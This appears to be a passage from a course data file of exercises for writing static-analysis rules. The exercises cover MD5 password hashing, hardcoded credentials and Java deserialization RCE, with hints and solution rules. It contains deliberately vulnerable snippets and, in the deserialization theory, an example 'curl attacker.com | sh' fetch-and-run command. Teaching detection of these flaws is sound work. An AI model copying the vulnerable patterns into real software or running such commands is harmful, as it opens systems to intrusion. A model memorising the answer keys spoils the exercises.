DepGuard generates compliance matrices keyed on OWASP category. A wrong mapping means:
- The **A02 cryptographic failures** score looks better than it is (false compliance)
- The **A03 injection** score looks worse (inflated noise)
- Audit reports are incorrect — a compliance failure in itself

**Rule of thumb:** if the vulnerability is about *what algorithm is used*, it's A02. If it's about *data flowing to a dangerous operation*, it's A03. If it's about *credentials or authentication*, it's A07.`,
    task: 'A developer wrote a rule to detect MD5 being used for password hashing, but used wrong OWASP and CWE metadata. Fix the metadata to correctly classify this as a cryptographic failure.',
    language: 'python',
    snippet: `import hashlib

def create_user(username, password):
    # VULNERABLE: MD5 is cryptographically broken for passwords
    # Salting doesn't help — MD5 is too fast for password hashing
    password_hash = hashlib.md5(password.encode()).hexdigest()
    db.execute("INSERT INTO users VALUES (?, ?)", (username, password_hash))

def verify_user(username, password):
    # VULNERABLE: same MD5 comparison
    stored = db.get_hash(username)
    return stored == hashlib.md5(password.encode()).hexdigest()

def hash_file(filepath):
    # OK for file integrity (non-security context)
    with open(filepath, 'rb') as f:
        return hashlib.md5(f.read()).hexdigest()`,
    starterRule: `rule python-weak-password-hash:
  version: "1.0.0"
  severity: high
  confidence: high
  languages: [python]
  cwe: ["CWE-89"]
  owasp: ["A03:2021-Injection"]

  query: |
    find call to "hashlib.md5"

  report:
    message: "MD5 used for password hashing"
    fix: "Use bcrypt, Argon2, or PBKDF2 for password hashing"`,
    assertions: {
      minFindings: 1,
      mustMatch: ['CWE-328', 'A02:2021-Cryptographic-Failures', 'hashlib.md5'],
    },
    hints: [
      'MD5 for passwords is a cryptographic failure — not an injection vulnerability',
      'The correct OWASP category is A02:2021-Cryptographic-Failures',
      'The correct CWE for weak hashing is CWE-328 (Use of Weak Hash)',
    ],
    solution: `rule python-weak-password-hash:
  version: "1.0.0"
  severity: high
  confidence: high
  languages: [python]
  cwe: ["CWE-328"]
  owasp: ["A02:2021-Cryptographic-Failures"]

  query: |
    find call to "hashlib.md5"

  exclude:
    paths: ["**/tests/**", "**/test/**"]

  report:
    message: "MD5 is cryptographically broken and must not be used for password hashing. MD5 produces hashes in microseconds — modern GPUs can crack millions of MD5 hashes per second."
    fix: "Replace hashlib.md5() with a password-specific hashing function: bcrypt (pip install bcrypt), Argon2 (pip install argon2-cffi), or hashlib.pbkdf2_hmac('sha256', ...) with at least 260,000 iterations."`,
  },
  {
    id: '7-2',
    level: 'expert',
    levelLabel: 'Expert',
    levelEmoji: '🛡️',
    module: 7,
    moduleTitle: 'Security Engineering',
    title: 'EU CRA Compliance Rules',
    xp: 600,
    theory: `## EU CRA Compliance Rules

The **EU Cyber Resilience Act** (CRA, effective 2027) places legal obligations on manufacturers of products with digital elements — including most commercial software. Penalties reach **€15 million or 2.5% of global turnover**.

### What CRA requires (security-relevant)

| CRA Article | Requirement | SAST implication |
|-------------|-------------|-----------------|
| Art. 13(1) | No known exploitable vulnerabilities at release | All \`critical\` and \`high\` findings must be resolved |
| Art. 13(3) | Secure by default configuration | Detect insecure defaults (debug mode, open CORS, etc.) |
| Art. 13(5) | Protect confidentiality, integrity, availability | Detect crypto failures, injection, data exposure |
| Art. 13(6) | Minimise attack surface | Detect unnecessary exposed endpoints, unused permissions |
| Art. 14 | Vulnerability handling & disclosure | Detect missing security contact info in SECURITY.md |
| Annex I | Mandatory security properties | No hardcoded credentials, authenticated access, encrypted comms |

### Hardcoded credentials (Art. 13 + Annex I)

Hardcoded passwords, API keys, and tokens are a direct CRA violation. Annex I explicitly requires that products do not ship with default or hardcoded credentials.

CWE mapping: **CWE-798** (Use of Hard-coded Credentials)  
OWASP: **A07:2021-Authentication Failures**  
CRA article: **Annex I, Part I, §1(e)**

### Writing CRA-grade rules

CRA compliance rules need especially clear \`fix\` guidance — the fix text becomes evidence in compliance audits. Include:
1. Why it's a CRA violation
2. The specific remediation step
3. What to do with already-exposed credentials

\`\`\`yaml
report:
  message: "Hardcoded credential: direct violation of CRA Annex I. Exposed in version control."
  fix: |
    1. Remove the hardcoded value and rotate it immediately.
    2. Load from environment variable or secrets manager (AWS Secrets Manager, HashiCorp Vault).
    3. Add pre-commit hooks to prevent future credential commits (git-secrets, truffleHog).
\`\`\`

### DepGuard integration

When Vigil rules include CRA-relevant OWASP/CWE mappings, DepGuard's **EU CRA Compliance Report** automatically counts them toward the compliance score. High-quality rule metadata = accurate compliance dashboards = evidence for auditors.`,
    task: 'Write a CRA-compliant rule for detecting hardcoded credentials (passwords, tokens, API keys) in Python source code — a direct violation of CRA Annex I',
    language: 'python',
    snippet: `import jwt
import requests

# VIOLATION: hardcoded password
DB_PASSWORD = "admin123"

# VIOLATION: hardcoded API key
API_KEY = "sk-proj-abc123xyz789secret"

# VIOLATION: hardcoded JWT secret
JWT_SECRET = "my-super-secret-key"

def get_token(user):
    return jwt.encode({"user": user}, JWT_SECRET, algorithm="HS256")

def call_api(endpoint):
    return requests.get(endpoint, headers={"Authorization": f"Bearer {API_KEY}"})

# SAFE: loaded from environment
import os
SAFE_SECRET = os.environ.get("APP_SECRET")
SAFE_KEY = os.environ.get("API_KEY")`,
    starterRule: `rule python-hardcoded-credentials:
  version: "1.0.0"
  severity: ???
  confidence: high
  languages: [python]
  cwe: ["???"]
  owasp: ["???"]

  query: |
    find pattern "$VAR = \\"$SECRET\\""
    where $VAR matches "(?i)(password|passwd|secret|key|token|credential|api_key)"

  report:
    message: "Hardcoded credential detected"
    fix: "Load from environment variables"`,
    assertions: {
      minFindings: 1,
      mustMatch: ['CWE-798', 'A07:2021', 'critical', 'fix:', 'owasp:'],
    },
    hints: [
      'Hardcoded credentials are a CRA Annex I violation — use severity `critical`',
      'CWE-798 is "Use of Hard-coded Credentials"',
      'OWASP category is A07:2021-Authentication-Failures',
      'The fix guidance should mention rotating the exposed credential',
    ],
    solution: `rule python-hardcoded-credentials:
  version: "1.0.0"
  severity: critical
  confidence: high
  languages: [python]
  cwe: ["CWE-798"]
  owasp: ["A07:2021-Authentication-Failures"]

  query: |
    find pattern "$VAR = \\"$SECRET\\""
    where $VAR matches "(?i)(password|passwd|secret|key|token|credential|api_key)"

  exclude:
    paths: ["**/tests/**", "**/test/**", "**/*.example*", "**/.env.example"]

  report:
    message: "Hardcoded credential in source code — direct violation of CRA Annex I. The value is exposed in version control and visible to anyone with repository access."
    fix: "1. Remove the hardcoded value and commit the change. 2. Rotate the credential immediately (assume it is compromised). 3. Load the value from an environment variable (os.environ.get('SECRET_NAME')) or a secrets manager. 4. Add a pre-commit hook (git-secrets or truffleHog) to prevent future incidents."`,
  },
  {
    id: '7-3',
    level: 'expert',
    levelLabel: 'Expert',
    levelEmoji: '🛡️',
    module: 7,
    moduleTitle: 'Security Engineering',
    title: 'Deserialization Attack Patterns',
    xp: 600,
    theory: `## Deserialization Attack Patterns

Java deserialization (CWE-502) is one of the most dangerous vulnerability classes — a single malformed HTTP request can result in Remote Code Execution. It powered attacks like **Log4Shell** (in the JNDI lookup chain) and the **Apache Commons Collections** gadget chains.

### How deserialization attacks work

1. Attacker crafts a malicious serialized Java object
2. Server calls \`ObjectInputStream.readObject()\`
3. Java deserializes the object, executing any \`readObject()\` override
4. The attacker's class calls \`Runtime.exec("curl attacker.com | sh")\`

The key: Java **executes code during deserialization**, before your application logic runs any validation.

### Two detection strategies

**Strategy 1 — Entry point detection** (find where deserialization happens):
\`\`\`yaml
query: |
  find call to "readObject"
\`\`\`
Finds all \`ObjectInputStream.readObject()\` calls. High recall, may have FPs for safe uses with ObjectInputFilter.

**Strategy 2 — Structural RCE pattern** (find readObject + exec together):
\`\`\`yaml
query: |
  find pattern "void readObject(ObjectInputStream $S) {
    ...
    $S.defaultReadObject();
    ...
    Runtime.getRuntime().exec($CMD);
    ...
  }"
\`\`\`
This is the precise RCE pattern — critical severity, very low FP rate.

### Why taint flow doesn't work here

\`defaultReadObject()\` is a **void method with side effects** — it restores object fields via reflection. Taint engines cannot trace through void side-effect methods. That's why the structural pattern approach (detecting the method structure) is more reliable than \`find flow from @deserialize to @os.exec\`.

### The safe pattern: ObjectInputFilter (Java 9+)

\`\`\`java
ObjectInputStream ois = new ObjectInputStream(inputStream);
ois.setObjectInputFilter(info -> {
    if (info.serialClass() == null) return UNDECIDED;
    return ALLOWED_CLASSES.contains(info.serialClass().getName())
        ? ALLOWED : REJECTED;
});
\`\`\`

Rules should check for the **absence** of \`ObjectInputFilter\` — a raw \`readObject()\` without a filter is always dangerous.

### Severity guidance

| Pattern | Severity |
|---------|---------|
| \`ObjectInputStream.readObject()\` without ObjectInputFilter | \`high\` |
| \`readObject()\` that calls \`defaultReadObject()\` then \`exec()\` | \`critical\` |
| Class implementing Serializable with custom \`readObject()\` | \`high\` |`,
    task: 'Write a critical severity rule to detect the most dangerous Java deserialization pattern: a custom readObject() method that calls defaultReadObject() and then passes deserialized fields to Runtime.exec() — direct Remote Code Execution',
    language: 'java',
    snippet: `// CRITICAL: custom readObject with exec — direct RCE
// Attacker controls 'taskAction' via the serialized payload
public class VulnerableTaskHolder implements Serializable {
    private String taskAction;
    private Date executionDate;

    private void readObject(ObjectInputStream stream) throws Exception {
        stream.defaultReadObject();           // restores attacker-controlled fields
        Runtime.getRuntime().exec(taskAction); // RCE — executes attacker's command
    }
}

// HIGH: readObject without ObjectInputFilter (no RCE, but unsafe entry point)
public class UserPrefs implements Serializable {
    private String theme;
    private boolean darkMode;

    private void readObject(ObjectInputStream ois)
            throws IOException, ClassNotFoundException {
        ois.defaultReadObject();
        validateTheme(this.theme);  // validation AFTER deserialization — too late
    }
}

// SAFE: using ObjectInputFilter to whitelist classes
public class SafeDeserializer {
    public Object deserialize(InputStream in) throws Exception {
        ObjectInputStream ois = new ObjectInputStream(in);
        ois.setObjectInputFilter(info -> {
            if (info.serialClass() == null) return UNDECIDED;
            return SAFE_CLASSES.contains(info.serialClass().getName())
                ? ALLOWED : REJECTED;
        });
        return ois.readObject();
    }
}`,
    starterRule: `rule java-deserialization-rce:
  version: "1.0.0"
  severity: ???
  confidence: high
  languages: [java]
  cwe: ["???"]
  owasp: ["???"]

  query: |
    find pattern "???"

  report:
    message: "Deserialization RCE pattern detected"
    fix: "Replace Java serialization with a safe format"`,
    assertions: {
      minFindings: 1,
      mustMatch: ['critical', 'CWE-502', 'A08:2021', 'readObject', 'defaultReadObject'],
    },
    hints: [
      'This is the most dangerous deserialization pattern — severity must be `critical`',
      'CWE-502 is "Deserialization of Untrusted Data"',
      'OWASP A08:2021 covers Software and Data Integrity Failures',
      'Use `find pattern` with a structural match: void readObject(...) containing defaultReadObject() and exec()',
      'The pattern: find pattern "void readObject(ObjectInputStream $S) { ... $S.defaultReadObject(); ... Runtime.getRuntime().exec($CMD); ... }"',
    ],
    solution: `rule java-deserialization-rce:
  version: "1.0.0"
  severity: critical
  confidence: high
  languages: [java]
  cwe: ["CWE-502", "CWE-78"]
  owasp: ["A08:2021-Software and Data Integrity Failures", "A03:2021-Injection"]

  query: |
    find pattern "void readObject(ObjectInputStream $STREAM) {
      ...
      $STREAM.defaultReadObject();
      ...
      Runtime.getRuntime().exec($CMD);
      ...
    }"

  exclude:
    paths: ["**/test/**", "**/tests/**", "**/*Test.java"]

  report:
    message: "CRITICAL: Custom readObject() calls defaultReadObject() then passes deserialized field to Runtime.exec() — direct Remote Code Execution. An attacker who sends a crafted serialized payload controls the value of $CMD."
    fix: "1. Replace Java native serialization with JSON (Jackson) or Protobuf. 2. If serialization is required, add ObjectInputFilter (Java 9+) to whitelist allowed classes. 3. Never call Runtime.exec() or ProcessBuilder with deserialized field values. 4. Consider using the serial-killer library to block gadget chains at the JVM level."`,
  },
];
